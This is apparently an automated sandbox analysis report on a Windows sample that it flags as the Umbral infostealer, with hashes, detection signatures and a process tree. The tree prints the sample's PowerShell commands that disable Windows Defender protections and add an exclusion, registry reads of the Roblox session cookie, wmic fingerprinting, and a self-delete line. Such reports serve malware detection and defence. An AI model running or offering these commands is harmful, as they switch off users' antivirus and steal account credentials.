Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
26-05-2024 17:31
Behavioral task
behavioral1
Sample
release5102024.exe
Resource
win7-20240419-en
General
-
Target
release5102024.exe
-
Size
234KB
-
MD5
0e686473973693d296760e2c8ea19dd8
-
SHA1
80bf5c75bebb592eb88322c3a4dda1f056b33b69
-
SHA256
330257ac72a4b7cb8d45cbb4d5f888bc6c69f139e7b0edf1cb64f2c733d846f7
-
SHA512
c06039e42a95c8ca0ec7fc8bfa5ac002208ffe69d49f7379ab272772496a1c08e165b7220748df52233ef7187c2204ecf2eecaa9a7aceeabd3b29bc32fe84e0f
-
SSDEEP
6144:XloZM+rIkd8g+EtXHkv/iD43WZwEbhS6FvAxDeebyAb8e1m9ii4:1oZtL+EP83WZwEbhS6FvAxDeeb7m
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2176-1-0x00000000003E0000-0x0000000000420000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops file in Drivers directory 1 IoCs
Processes:
release5102024.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts release5102024.exe -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2156 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
release5102024.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2176 release5102024.exe 2860 powershell.exe 2624 powershell.exe 2528 powershell.exe 284 powershell.exe 1780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
release5102024.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 2176 release5102024.exe Token: SeIncreaseQuotaPrivilege 2776 wmic.exe Token: SeSecurityPrivilege 2776 wmic.exe Token: SeTakeOwnershipPrivilege 2776 wmic.exe Token: SeLoadDriverPrivilege 2776 wmic.exe Token: SeSystemProfilePrivilege 2776 wmic.exe Token: SeSystemtimePrivilege 2776 wmic.exe Token: SeProfSingleProcessPrivilege 2776 wmic.exe Token: SeIncBasePriorityPrivilege 2776 wmic.exe Token: SeCreatePagefilePrivilege 2776 wmic.exe Token: SeBackupPrivilege 2776 wmic.exe Token: SeRestorePrivilege 2776 wmic.exe Token: SeShutdownPrivilege 2776 wmic.exe Token: SeDebugPrivilege 2776 wmic.exe Token: SeSystemEnvironmentPrivilege 2776 wmic.exe Token: SeRemoteShutdownPrivilege 2776 wmic.exe Token: SeUndockPrivilege 2776 wmic.exe Token: SeManageVolumePrivilege 2776 wmic.exe Token: 33 2776 wmic.exe Token: 34 2776 wmic.exe Token: 35 2776 wmic.exe Token: SeIncreaseQuotaPrivilege 2776 wmic.exe Token: SeSecurityPrivilege 2776 wmic.exe Token: SeTakeOwnershipPrivilege 2776 wmic.exe Token: SeLoadDriverPrivilege 2776 wmic.exe Token: SeSystemProfilePrivilege 2776 wmic.exe Token: SeSystemtimePrivilege 2776 wmic.exe Token: SeProfSingleProcessPrivilege 2776 wmic.exe Token: SeIncBasePriorityPrivilege 2776 wmic.exe Token: SeCreatePagefilePrivilege 2776 wmic.exe Token: SeBackupPrivilege 2776 wmic.exe Token: SeRestorePrivilege 2776 wmic.exe Token: SeShutdownPrivilege 2776 wmic.exe Token: SeDebugPrivilege 2776 wmic.exe Token: SeSystemEnvironmentPrivilege 2776 wmic.exe Token: SeRemoteShutdownPrivilege 2776 wmic.exe Token: SeUndockPrivilege 2776 wmic.exe Token: SeManageVolumePrivilege 2776 wmic.exe Token: 33 2776 wmic.exe Token: 34 2776 wmic.exe Token: 35 2776 wmic.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 284 powershell.exe Token: SeIncreaseQuotaPrivilege 2020 wmic.exe Token: SeSecurityPrivilege 2020 wmic.exe Token: SeTakeOwnershipPrivilege 2020 wmic.exe Token: SeLoadDriverPrivilege 2020 wmic.exe Token: SeSystemProfilePrivilege 2020 wmic.exe Token: SeSystemtimePrivilege 2020 wmic.exe Token: SeProfSingleProcessPrivilege 2020 wmic.exe Token: SeIncBasePriorityPrivilege 2020 wmic.exe Token: SeCreatePagefilePrivilege 2020 wmic.exe Token: SeBackupPrivilege 2020 wmic.exe Token: SeRestorePrivilege 2020 wmic.exe Token: SeShutdownPrivilege 2020 wmic.exe Token: SeDebugPrivilege 2020 wmic.exe Token: SeSystemEnvironmentPrivilege 2020 wmic.exe Token: SeRemoteShutdownPrivilege 2020 wmic.exe Token: SeUndockPrivilege 2020 wmic.exe Token: SeManageVolumePrivilege 2020 wmic.exe Token: 33 2020 wmic.exe Token: 34 2020 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
release5102024.execmd.exedescription pid process target process PID 2176 wrote to memory of 2776 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 2776 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 2776 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 2732 2176 release5102024.exe attrib.exe PID 2176 wrote to memory of 2732 2176 release5102024.exe attrib.exe PID 2176 wrote to memory of 2732 2176 release5102024.exe attrib.exe PID 2176 wrote to memory of 2860 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 2860 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 2860 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 2624 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 2624 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 2624 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 2528 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 2528 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 2528 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 284 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 284 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 284 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 2020 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 2020 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 2020 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 1584 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 1584 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 1584 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 2000 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 2000 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 2000 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 1780 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 1780 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 1780 2176 release5102024.exe powershell.exe PID 2176 wrote to memory of 888 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 888 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 888 2176 release5102024.exe wmic.exe PID 2176 wrote to memory of 2156 2176 release5102024.exe cmd.exe PID 2176 wrote to memory of 2156 2176 release5102024.exe cmd.exe PID 2176 wrote to memory of 2156 2176 release5102024.exe cmd.exe PID 2156 wrote to memory of 620 2156 cmd.exe PING.EXE PID 2156 wrote to memory of 620 2156 cmd.exe PING.EXE PID 2156 wrote to memory of 620 2156 cmd.exe PING.EXE -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\release5102024.exe"C:\Users\Admin\AppData\Local\Temp\release5102024.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\release5102024.exe"2⤵
- Views/modifies file attributes
PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release5102024.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:284
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1584
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1780
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:888
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\release5102024.exe" && pause2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:620
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD533ca05928949eec905d0e2f25151c9c3
SHA1b4561dd4ace1a093a22476deb947cf0a844eb818
SHA256b327daba3757c0a7bd6b31a1d5a6292cf069774fcaba4398107c2c9a72da6957
SHA512e68d72d5242ddc3fc6332c409c4b7a3e07b6ea2f15d739cc2681bb39b9e225ab0191760df1a084d46ffd6e8086d12f9263427391bec3a56bd2e398987eefdf7b
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e